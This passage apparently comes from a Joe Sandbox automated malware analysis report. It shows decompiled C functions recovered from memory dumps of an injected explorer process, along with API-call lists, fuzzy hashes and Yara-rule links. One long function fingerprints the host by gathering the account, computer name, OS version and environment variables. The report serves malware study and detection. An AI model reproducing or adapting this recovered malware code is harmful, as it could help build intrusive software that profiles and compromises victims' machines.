0x015096ef
0x00000000
0x015096bb
0x015096b4
0x00000000
0x015096b4
0x01509693
0x00000000
0x01509693
0x01509665
0x00000000
0x01509665
0x01509630
0x00000000
0x01509630
0x00000000

APIs

Part of subcall function 01516AF0: lstrlenA.KERNEL32(?,?,?,jkfkdm), ref: 01516B3F

Part of subcall function 01520E00: LoadLibraryA.KERNEL32(?,?,?,?,0150996C,readrr956964,?,?,readrr956964,?,00000000,?,?), ref: 01520E1A
Part of subcall function 01520E00: GetProcAddress.KERNEL32(00000000,GetTickCount64,?,?,?,?,0150996C,readrr956964,?), ref: 01520E3E
Part of subcall function 01520E00: __aulldiv.LIBCMT ref: 01520E59
Part of subcall function 01520E00: FreeLibrary.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,?,?,0150996C), ref: 01520E68

lstrlenA.KERNEL32(00000000,?,?,?,?), ref: 0150961A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Librarylstrlen$AddressFreeLoadProc__aulldiv
String ID:
API String ID: 2233768534-0
Opcode ID: 7be808e9b01cdb494131bf820b84fb4a80a198e415e2de81bddea2b5ff8f5301
Instruction ID: 83af368a0a31c79f6aa9592290def6ac7318cfd2f85439f9cf7e008ab224e104
Opcode Fuzzy Hash: 7be808e9b01cdb494131bf820b84fb4a80a198e415e2de81bddea2b5ff8f5301
Instruction Fuzzy Hash: B74146B2C1012ABBCF129FD4CC41CEEBB79BB18324F10464AFA25B61E5E7718654DB91

Uniqueness

Uniqueness Score: 0.02%

Function 003F69A0, Relevance: 1.3, APIs: 1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 133f4a7ff9c7d654fd5308d3cd71d1320489f2aca9b3fc17fdbc2fc135a77c54
Instruction ID: 99dfb695c7d7eaa456a0106a5755a441dbd7f098473a26182de97b68b38f483f
Opcode Fuzzy Hash: 133f4a7ff9c7d654fd5308d3cd71d1320489f2aca9b3fc17fdbc2fc135a77c54
Instruction Fuzzy Hash: B23139B1A0020CEBDF05DBA4DD5AFFE77B8AB48700F20C119F706BA180D7B19A448B64

Uniqueness

Uniqueness Score: 0.00%

Function 015097CC, Relevance: 1.3, APIs: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E015097CC(signed int __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				char _v8;
				char _v12;
				CHAR* _v16;
				char _v20;
				CHAR* _t27;
				intOrPtr _t29;
				void* _t49;
				void* _t54;

				_t54 = __eflags;
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_t27 = E01509052(__ecx, _t54, _a16, _a20, _a24, _a28, _a32, E01520E00(__ecx), _a36, _a40);
				_v16 = _t27;
				if(_t27 != 0) {
					_t29 = E01508AEC( &_v8, __eflags, _v16, lstrlenA(_t27), _a4,  &_v8,  &_v12, _a44); // executed
					__eflags = _t29;
					if(_t29 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							L7:
							_push(0xfffffffd);
							L8:
							_pop(_t49);
							L9:
							E01513990( &_v16, 0xffffffff); // executed
							E01513990( &_v8, 0xffffffff);
							E01513990( &_v20, 0xffffffff);
							return _t49;
						}
						__eflags = E0151C270(_v8, _v12);
						if(__eflags == 0) {
							goto L7;
						}
						_v20 = E01508A83(__eflags, _v8);
						_t49 = E01508C77(_t38);
						goto L9;
					}
					_push(0xfffffffe);
					goto L8;
				}
				return _t27 | 0xffffffff;
			}

0x015097cc
0x015097d5
0x015097d8
0x015097db
0x015097de
0x015097fc
0x01509804
0x01509809
0x01509829
0x01509831
0x01509833
0x01509839
0x0150983c
0x01509866
0x01509866
0x01509868
0x01509868
0x01509869
0x0150986f
0x0150987a
0x01509885
0x00000000
0x0150988d
0x0150984b
0x0150984d
0x00000000
0x00000000
0x01509858
0x01509862
0x00000000
0x01509862
0x01509835
0x00000000
0x01509835
0x00000000

APIs

Part of subcall function 01520E00: LoadLibraryA.KERNEL32(?,?,?,?,0150996C,readrr956964,?,?,readrr956964,?,00000000,?,?), ref: 01520E1A
Part of subcall function 01520E00: GetProcAddress.KERNEL32(00000000,GetTickCount64,?,?,?,?,0150996C,readrr956964,?), ref: 01520E3E
Part of subcall function 01520E00: __aulldiv.LIBCMT ref: 01520E59
Part of subcall function 01520E00: FreeLibrary.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,?,?,0150996C), ref: 01520E68

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000005,00000000,?,?), ref: 0150981F

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc__aulldivlstrlen
String ID:
API String ID: 2909394512-0
Opcode ID: 7a54b8f02e776d81903dfe8c19902c8fbfa18ba83828e78f151a776d4a39b4fa
Instruction ID: 931254405c9da604f36f653a756441678c61051221485f07a1a59c8606203619
Opcode Fuzzy Hash: 7a54b8f02e776d81903dfe8c19902c8fbfa18ba83828e78f151a776d4a39b4fa
Instruction Fuzzy Hash: 5A211672C0412AFADF12AFE8DC008DE7A79BF18224F200756F525AA2E5E73187509B90

Uniqueness

Uniqueness Score: 0.02%

Function 01509720, Relevance: 1.3, APIs: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01509720(void* __ecx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				char _v20;
				CHAR* _t20;
				intOrPtr _t22;
				void* _t43;

				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_t20 = E01508E75(__ecx, _a16); // executed
				_v16 = _t20;
				if(_t20 != 0) {
					_t22 = E01508AEC( &_v8, __eflags, _v16, lstrlenA(_t20), _a4,  &_v8,  &_v12, _a20); // executed
					__eflags = _t22;
					if(_t22 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							L7:
							_push(0xfffffffd);
							L8:
							_pop(_t43);
							L9:
							E01513990( &_v16, 0xffffffff);
							E01513990( &_v8, 0xffffffff);
							E01513990( &_v20, 0xffffffff);
							return _t43;
						}
						__eflags = E0151C270(_v8, _v12);
						if(__eflags == 0) {
							goto L7;
						}
						_v20 = E01508A83(__eflags, _v8);
						_t43 = E01508C77(_t31);
						goto L9;
					}
					_push(0xfffffffe);
					goto L8;
				}
				return _t20 | 0xffffffff;
			}

0x0150972c
0x0150972f
0x01509732
0x01509735
0x01509738
0x0150973e
0x01509743
0x01509763
0x0150976b
0x0150976d
0x01509773
0x01509776
0x015097a0
0x015097a0
0x015097a2
0x015097a2
0x015097a3
0x015097a9
0x015097b4
0x015097bf
0x00000000
0x015097c7
0x01509785
0x01509787
0x00000000
0x00000000
0x01509792
0x0150979c
0x00000000
0x0150979c
0x0150976f
0x00000000
0x0150976f
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,?,?,?,?,readrr956964,?), ref: 01509759

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 225f3bc5c838c18d19fd2239c3181861e1a3879e84c7449404c20edcb9beeb27
Instruction ID: 3c0453fd7573a47c53c8a1f86d303cd076565d89266ffe6ae05f89c87516e232
Opcode Fuzzy Hash: 225f3bc5c838c18d19fd2239c3181861e1a3879e84c7449404c20edcb9beeb27
Instruction Fuzzy Hash: 5011AF72C0412ABADF02AFE8DC048DDBBB8BF56234B200756F434EA1D5EB3197409B91

Uniqueness

Uniqueness Score: 0.02%

Function 01506F12, Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E01506F12(void* __ecx, void* __esi, void** _a4, intOrPtr _a8) {
				void* _t8;
				void* _t15;
				void** _t16;

				_t15 = __esi;
				_t11 = __ecx;
				if(_a8 == 0) {
					L2:
					_push(_t15);
					_t16 = _a4;
					_t6 =  &(_t16[3]);
					if(_t16[3] != 0) {
						E01513990(_t6, _t16[4]);
						_pop(_t11);
					}
					CloseHandle( *_t16); // executed
					_t8 = E01513BA0(_t11, _t16, 0, 0x20);
					 *0x15379bc =  *0x15379bc - 1;
					if(_a8 != 0) {
						return E015188D0( *0x15379c4);
					}
				} else {
					_t8 = E01518890(__ecx,  *0x15379c4, 0x7530);
					_pop(_t11);
					if(_t8 >= 0) {
						goto L2;
					}
				}
				return _t8;
			}

0x01506f12
0x01506f12
0x01506f19
0x01506f31
0x01506f31
0x01506f32
0x01506f35
0x01506f3b
0x01506f41
0x01506f47
0x01506f47
0x01506f4a
0x01506f55
0x01506f5d
0x01506f68
0x00000000
0x01506f75
0x01506f1b
0x01506f26
0x01506f2c
0x01506f2f
0x00000000
0x00000000
0x01506f2f
0x01506f77

APIs

CloseHandle.KERNEL32(?,?,?,01506FB6,?,00000001), ref: 01506F4A

Part of subcall function 01518890: WaitForSingleObject.KERNEL32(?,?,?,?,01506F8C,?,00003A98), ref: 0151889C

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandleObjectSingleWait
String ID:
API String ID: 528846559-0
Opcode ID: 0d4dfbe4b58e9a2d172895c991c03d8029ef09881191d06c73541e071b55997c
Instruction ID: 27c643599ed8d183aa478715d43c80bd4ea830704748ca8cce23aa24ed36cb07
Opcode Fuzzy Hash: 0d4dfbe4b58e9a2d172895c991c03d8029ef09881191d06c73541e071b55997c
Instruction Fuzzy Hash: D3F0F032808702EBFB326F54ED05B583BA4BB10360F508069EA245E4E8EB72B454DF58

Uniqueness

Uniqueness Score: 0.03%

Function 01509554, Relevance: 1.3, APIs: 1, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E01509554(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				CHAR* _t13;
				void* _t24;

				_t24 = __eflags;
				_t19 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t13 = E01508FAC(__ecx, __edx, _a8, _a12, _a16, _a20, _a24);
				_v8 = _t13;
				E01508AEC(_t19, _t24, _v8, lstrlenA(_t13), _a4, 0, 0, _a28); // executed
				E01513990( &_v8, 0xffffffff);
				return 0;
			}

0x01509554
0x01509554
0x01509557
0x0150955b
0x0150956b
0x01509576
0x0150958b
0x01509596
0x015095a1

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,?,00000000,?), ref: 01509581

Part of subcall function 01513990: lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
Part of subcall function 01513990: HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeHeap
String ID:
API String ID: 4056650430-0
Opcode ID: 540503bcda0dc63763548cae6dd1c341ec9fb985bcc6e44c9f469c96d0bc2be3
Instruction ID: 66ae1a391f3b8215b706d2d4fcf3c7f8ac77d12fad0a0c34e4f3470c88a38a6a
Opcode Fuzzy Hash: 540503bcda0dc63763548cae6dd1c341ec9fb985bcc6e44c9f469c96d0bc2be3
Instruction Fuzzy Hash: DFF0127280020AFFDF12AFD0DD06F9E3A7AFB14324F104550FA20651A0E776DA20AB51

Uniqueness

Uniqueness Score: 0.02%

Function 01506F78, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E01506F78(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				void* _t11;
				void* _t19;
				intOrPtr _t22;

				_t22 = _a4;
				_t11 = E01518890(__ecx,  *(_t22 + 0x1c), 0x3a98);
				_pop(_t19);
				if(_t11 >= 0) {
					CloseHandle( *(_t22 + 0x1c)); // executed
					 *((intOrPtr*)(_t22 + 0x18)) =  *((intOrPtr*)(_t22 + 8))( *((intOrPtr*)(_t22 + 0xc)));
					if(( *(_t22 + 0x14) & 0x00000001) == 0) {
						E01506F12(_t19, _t22, _t22, 1); // executed
					}
					return  *((intOrPtr*)(_t22 + 0x18));
				}
				return 0;
			}

0x01506f7c
0x01506f87
0x01506f8d
0x01506f90
0x01506f99
0x01506fa9
0x01506fac
0x01506fb1
0x01506fb7
0x00000000
0x01506fb8
0x00000000

APIs

Part of subcall function 01518890: WaitForSingleObject.KERNEL32(?,?,?,?,01506F8C,?,00003A98), ref: 0151889C

CloseHandle.KERNEL32(?), ref: 01506F99

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandleObjectSingleWait
String ID:
API String ID: 528846559-0
Opcode ID: cc8be27608677f77270b163433a81b07c58bfcef99734664e526ca12c1b6f562
Instruction ID: f5aa21859572a42080475424b801208edd62e179c244f6b3c38edd62a6b1cc6d
Opcode Fuzzy Hash: cc8be27608677f77270b163433a81b07c58bfcef99734664e526ca12c1b6f562
Instruction Fuzzy Hash: 14F0E532108702AFD7335F94F804A87BBE8BF11360B10482EF992DA8D1DB62B4549B94

Uniqueness

Uniqueness Score: 0.03%

Function 003F6F80, Relevance: 1.3, APIs: 1, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003F6F80(void* __eflags, intOrPtr _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v2516;
				void* _t23;

				_t23 = __eflags;
				_v8 = E003FDD20(_a8, lstrlenA(_a8), 0);
				E003F8800(_v8,  &_v2516);
				E003F6E90(_t23, _a4,  &_v2516); // executed
				return 0;
			}

0x003f6f80
0x003f6fa2
0x003f6fb0
0x003f6fc3
0x003f6fd0

APIs

lstrlenA.KERNEL32(003F8B80,00000000), ref: 003F6F8F

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: d4ca22377ad389a78944457a98efad58812faf2c76e7905a2ac31cf8539fa319
Instruction ID: eedc1fcb82cb70d7a5af71041ba37562ac2448a74440a9b40cb50d7d1fb2ea0e
Opcode Fuzzy Hash: d4ca22377ad389a78944457a98efad58812faf2c76e7905a2ac31cf8539fa319
Instruction Fuzzy Hash: E6F037B6D0020C77CB00EBA4EC46EAA73799F48300F008559FA0CDB141F53197148BD5

Uniqueness

Uniqueness Score: 0.02%

Function 0150626D, Relevance: 1.3, APIs: 1, Instructions: 21
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150626D(CHAR* _a4) {
				int _t2;
				void* _t5;
				void* _t6;
				CHAR* _t7;

				_t7 = _a4;
				if(_t7 == 0) {
					L3:
					return _t2 | 0xffffffff;
				}
				_t2 = lstrlenA(_t7);
				if(_t2 == 0) {
					goto L3;
				}
				E01516880(_t6, _t7);
				_t5 = E0151B400(E0150621F, _t7); // executed
				return _t5;
			}

0x01506271
0x01506276
0x01506299
0x00000000
0x01506299
0x01506279
0x01506281
0x00000000
0x00000000
0x01506284
0x0150628f
0x00000000

APIs

lstrlenA.KERNEL32(015042DB,00000000,?,015042DB,00000000), ref: 01506279

Part of subcall function 01516880: lstrlenA.KERNEL32(0151B4FD,?,?,0151B4FD), ref: 015168A1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 736454f1d5713f5c40aa51badd366d0e6c9bbbba994a0e4a1e1d8a2d8227156a
Instruction ID: 310a0dbea3ef83bc44c2b7ddb2498291227d033d6de3def6976f6ee54ec36b1c
Opcode Fuzzy Hash: 736454f1d5713f5c40aa51badd366d0e6c9bbbba994a0e4a1e1d8a2d8227156a
Instruction Fuzzy Hash: B5D02B71A0162722552325991C0099E3B4C6E535703080218FD2C5E2C0C641A11141F2

Uniqueness

Uniqueness Score: 0.02%

Function 0151C7F0, Relevance: 1.3, APIs: 1, Instructions: 20
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0151C7F0(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				void* _t11;

				_t3 = lstrlenW(_a16) + 2; // 0x2
				_t11 = E0151C470(_a4, _a8, _a12, 1, _a16, _t9 + _t3); // executed
				return _t11;
			}

0x0151c7fd
0x0151c814
0x0151c81d

APIs

lstrlenW.KERNEL32(0151D2D5,?,0151D2D5,?,00000000,00000000,?), ref: 0151C7F7

Part of subcall function 0151C470: lstrlenW.KERNEL32(C:\Windows,?,00000000), ref: 0151C4F4
Part of subcall function 0151C470: lstrlenW.KERNEL32(80000001,?,00000000), ref: 0151C500
Part of subcall function 0151C470: lstrlenW.KERNEL32(?,?,00000000), ref: 0151C50E
Part of subcall function 0151C470: lstrlenW.KERNEL32(00000000,?,00000000), ref: 0151C51A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 0309931fbd5cacf7bca6ab983c3ecdf10d43bd56a352880a25f401332729259e
Instruction ID: a13f872943321da14d6b3ae66d61586c8e85ecda70ee85b5b4fb988532a5b20d
Opcode Fuzzy Hash: 0309931fbd5cacf7bca6ab983c3ecdf10d43bd56a352880a25f401332729259e
Instruction Fuzzy Hash: 38E0ECB654420ABBCB04DF98EC85DAB33ACAB8C704F008508FA188B245D671E9108BA1

Uniqueness

Uniqueness Score: 0.02%

Function 01513960, Relevance: 1.3, APIs: 1, Instructions: 14
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01513960(void* __ecx, long _a4) {
				void* _v8;
				void* _t5;
				void* _t8;

				_t8 =  *0x1538850; // 0x18e0000
				_t5 = HeapAlloc(_t8, 8, _a4); // executed
				_v8 = _t5;
				return _v8;
			}

0x0151396a
0x01513971
0x01513977
0x01513980

APIs

HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: b1b66cab76b6ba8f35077c6c9af71c1a17b940f1a42744779615fc0412175575
Instruction ID: 9c4e5f8becace8db635eb6214aa12d3db7d85b48061a71eacf2d12bcf5214d1c
Opcode Fuzzy Hash: b1b66cab76b6ba8f35077c6c9af71c1a17b940f1a42744779615fc0412175575
Instruction Fuzzy Hash: CAD0C975614208BFD724DF98E941D6ABBECE709250F10468CFD089B340DA32AE049B90

Uniqueness

Uniqueness Score: 0.06%

Function 003F3EE0, Relevance: 1.3, APIs: 1, Instructions: 14
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003F3EE0(void* __ecx, long _a4) {
				void* _v8;
				void* _t5;
				void* _t8;

				_t8 =  *0x40f6e0; // 0x15a0000
				_t5 = HeapAlloc(_t8, 8, _a4); // executed
				_v8 = _t5;
				return _v8;
			}

0x003f3eea
0x003f3ef1
0x003f3ef7
0x003f3f00

APIs

HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 6989bc16db099f867cd0ac7650a0c29e96b13014ec35094375ffaa7951e210af
Instruction ID: a2db6fe82f286cdbb85db8753e62d55767765c9efe5e7104283f6a3b58d12de4
Opcode Fuzzy Hash: 6989bc16db099f867cd0ac7650a0c29e96b13014ec35094375ffaa7951e210af
Instruction Fuzzy Hash: FED0C975614208BBC714DF98ED41D6E7BACEB09350F1041A8FD08A7350DA72AE048BA4

Uniqueness

Uniqueness Score: 0.06%

Non-executed Functions

Function 003FA090, Relevance: 70.5, APIs: 31, Strings: 9, Instructions: 482
stringlibraryloaderUNIQUELIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 50%

			E003FA090(void* __ecx, void* __fp0, struct _OSVERSIONINFOA* _a4, struct HINSTANCE__* _a8, WCHAR* _a12, signed int _a16) {
				WCHAR* _v8;
				union _SID_NAME_USE _v12;
				WCHAR* _v16;
				long _v20;
				WCHAR* _v24;
				long _v28;
				long _v32;
				WCHAR* _v36;
				short _v564;
				char _v628;
				long _v632;
				char _v3140;
				intOrPtr _t145;
				signed int _t149;
				signed int _t150;
				signed int _t157;
				int _t188;
				intOrPtr _t192;
				short _t201;
				signed int _t204;
				signed int _t206;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				WCHAR* _t266;
				WCHAR* _t296;
				WCHAR* _t299;
				WCHAR* _t357;
				void* _t373;
				void* _t375;
				void* _t377;
				void* _t387;
				void* _t389;
				void* _t396;

				_t396 = __fp0;
				_v28 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				E003F4120(__ecx, _a4, 0, 0x1ed8);
				 *((intOrPtr*)(_a4 + 0x1a54)) = GetCurrentProcessId();
				E003F8800(GetTickCount() +  *((intOrPtr*)(_a4 + 0x1a54)), _a4 + 0xa5c);
				_t375 = _t373 + 0x14;
				if(GetModuleFileNameW(0, _a4 + 0x1a58, 0x105) != 0) {
					__eflags = _a4 + 0x1a58;
					_t145 = E003F4730(_a4 + 0x1a58, _a4 + 0x1a58, 0x5c);
					_t375 = _t375 + 8;
					 *((intOrPtr*)(_a4 + 0x1c64)) = _t145;
				} else {
					while(0 != 0) {
					}
				}
				 *(_a4 + 0x104) = E003F74B0(GetCurrentProcess());
				_t257 =  *( *(_a4 + 0x104));
				_t149 = E003F7660( *( *(_a4 + 0x104)));
				_t377 = _t375 + 8;
				__eflags = _t149;
				if(_t149 == 0) {
					_t150 = E003F7550(_t257);
					__eflags = _t150;
					if(_t150 <= 0) {
						 *((intOrPtr*)(_a4 + 0x408)) = 1;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L18;
							}
						}
					} else {
						 *((intOrPtr*)(_a4 + 0x408)) = 2;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
					}
				} else {
					 *((intOrPtr*)(_a4 + 0x408)) = 3;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L18:
				 *(_a4 + 0x40c) = _a8;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_v28 = 0x80;
				_v20 = 0x80;
				_t157 = LookupAccountSidW(0,  *( *(_a4 + 0x104)), _a4 + 0x208,  &_v28, _a4 + 0x308,  &_v20,  &_v12);
				__eflags = _t157;
				if(_t157 == 0) {
					_v32 = GetLastError();
					__eflags = _a4 + 0x308;
					E003F3B30(_a4 + 0x308, 0x80, L"LookupAccountSidW() err %u", _v32);
					_t377 = _t377 + 0x10;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L25;
						}
					}
				}
				L25:
				__eflags = _a16 & 0x00000002;
				if((_a16 & 0x00000002) == 0) {
					__eflags = _a16 & 0x00000004;
					if((_a16 & 0x00000004) == 0) {
						_t266 = _a4 + 0x410;
						__eflags = _t266;
						GetModuleFileNameW( *(_a4 + 0x40c), _t266, 0x20a);
					} else {
						_v16 = _a12;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						lstrcpynW(_a4 + 0x410, _v16, 0x105);
						 *0x411610 = _v16[0x17f];
						 *0x411614 = _v16[0x183];
						 *0x411618 = _v16[0x185];
						 *0x41161c = _v16[0x189];
						 *0x411620 = _v16[0x18b];
						 *0x411624 = _v16[0x18f];
						 *0x411628 = _v16[0x191];
						 *0x41162c = _v16[0x195];
						 *0x411630 = _v16[0x197];
						 *0x411634 = _v16[0x19b];
					}
				} else {
					_v8 = _a12;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					lstrcpynW(_a4 + 0x410, _v8, 0x20a);
				}
				 *((intOrPtr*)(_a4 + 0x61c)) = E003F4730(__eflags, _a4 + 0x410, 0x5c);
				lstrcpynW(_a4 + 0xc4, E003F4730(__eflags, _a4 + 0x410, 0x5c), 0x40);
				 *((short*)(_a4 + 0xbc + lstrlenW(_a4 + 0xc4) * 2)) = 0;
				E003F4B90(_a4 + 0xc4, _a4 + 0xc4, _a4 + 0xa4, 0x20);
				E003F4780(_a4 + 0x410, _a4 + 0x620);
				lstrcpynW(_a4 + 0x850, _a4 + 0x620, 0x105);
				lstrcatW(_a4 + 0x850, 0x4087f0);
				lstrcatW(_a4 + 0x850, _a4 + 0xc4);
				_v36 = E003F7F40(_a4 + 0xc4, 0x188c);
				lstrcatW(_a4 + 0x850, _v36);
				E003F8170( &_v36);
				E003F4820(__eflags, _a4 + 0x82a, 0xa, 0xf, _a4 + 0xa5c);
				_t188 = lstrlenA(_a4 + 0xa4);
				__eflags = _a4 + 0xa4;
				E003F9910(_a4 + 0xa4, _t396, E003FDD20(_a4 + 0xa4, _t188, 0), _a4 + 0x1420);
				_t192 = E003F76E0(GetCurrentProcess());
				_t387 = _t377 + 0x54;
				 *((intOrPtr*)(_a4 + 0x1430)) = _t192;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				E003F4120(0, _a4, 0, 0x9c);
				_a4->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_a4);
				 *((intOrPtr*)(_a4 + 0x1dac)) = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *((intOrPtr*)(_a4 + 0xa0)) = E003F9F10(_a4);
				_push( *((intOrPtr*)(_a4 + 0xa0)));
				_t201 = E003F9F40();
				_t389 = _t387 + 0x10;
				 *((short*)(_a4 + 0x9c)) = _t201;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_t204 = GetWindowsDirectoryW(_a4 + 0x1434, 0x104);
				__eflags = _t204;
				if(_t204 != 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L48;
						}
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L48:
				_t206 = GetEnvironmentVariableW(L"SystemRoot",  &_v564, 0x104);
				__eflags = _t206;
				if(_t206 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t357 = _a4 + 0x1434;
					__eflags = _t357;
					SetEnvironmentVariableW(L"SystemRoot", _t357);
				}
				_t209 = GetEnvironmentVariableW(L"USERPROFILE", _a4 + 0x1848, 0x209);
				__eflags = _t209;
				if(_t209 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_push("TEMP");
					E003F3B30(_a4 + 0x1848, 0x20a, L"%s\\%s", _a4 + 0x1434);
					_t389 = _t389 + 0x14;
					_t299 = _a4 + 0x1848;
					__eflags = _t299;
					SetEnvironmentVariableW(L"USERPROFILE", _t299);
				}
				_t210 = GetEnvironmentVariableW(L"TEMP", _a4 + 0x163e, 0x20a);
				__eflags = _t210;
				if(_t210 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t296 = _a4 + 0x1848;
					__eflags = _t296;
					SetEnvironmentVariableW(L"TEMP", _t296);
				}
				_t211 = GetEnvironmentVariableA("SystemDrive",  &_v628, 0x3f);
				__eflags = _t211;
				if(_t211 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					SetEnvironmentVariableA("SystemDrive", "C:");
				}
				_v632 = 0x7f;
				GetComputerNameW(_a4 + 0x1db0,  &_v632);
				E003F8800(E003FDD20(_a4 + 0x1420, lstrlenA(_a4 + 0x1420), 0),  &_v3140);
